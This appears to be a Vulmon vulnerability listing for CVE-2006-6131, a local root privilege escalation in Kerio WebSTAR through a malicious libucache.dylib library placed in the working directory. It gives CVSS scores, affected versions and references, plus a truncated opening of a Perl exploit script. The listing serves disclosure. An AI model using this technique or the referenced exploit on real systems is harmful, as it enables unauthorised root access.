Published: 28/11/2006 Updated: 07/11/2023

CVSS v2 Base Score: 6.2 | Impact Score: 10 | Exploitability Score: 1.9

VMScore: 625

Vector: AV:L/AC:H/Au:N/C:C/I:C/A:C

Untrusted search path vulnerability in (1) WSAdminServer and (2) WSWebServer in Kerio WebSTAR (4D WebSTAR Server Suite) 5.4.2 and previous versions allows local users with webstar privileges to gain root privileges via a malicious libucache.dylib helper library in the current working directory.

Vulnerable Product	Search on Vulmon	Subscribe to Product
kerio webstar 5.4
kerio webstar 5.3
kerio webstar 4.0
kerio webstar 5.3.1
kerio webstar 5.2.3
kerio webstar 5.3.4
kerio webstar 5.1.3
kerio webstar 5.2.4
kerio webstar 5.2.1
kerio webstar
kerio webstar 5.1.2
kerio webstar 5.2
kerio webstar 5.2.2
kerio webstar 5.3.2
kerio webstar 5.3.3

#!/usr/bin/perl # # wwwdigitalmunitioncom # written by kf (kf_lists[at]digitalmunition[dot]com) # # you must have access to the webstar user or be in the admin group # # This is currently not patched chmod -s your kerio binaries foreach $key (keys %ENV) { delete $ENV{$key}; } $tgts{"0"} = "kerio-webstar-542-macbin - WSAdminSer ...

NVD-CWE-Other http://www.securityfocus.com/bid/21123 http://www.osvdb.org/30450 http://securitytracker.com/id?1017239 http://secunia.com/advisories/22906 http://securityreason.com/securityalert/1921 http://www.vupen.com/english/advisories/2006/4539 https://exchange.xforce.ibmcloud.com/vulnerabilities/30308 http://www.securityfocus.com/archive/1/451832/100/200/threaded http://www.digitalmunition.com/DMA%5B2006-1115a%5D.txt https://nvd.nist.gov https://www.exploit-db.com/exploits/2788/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2006-6131

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect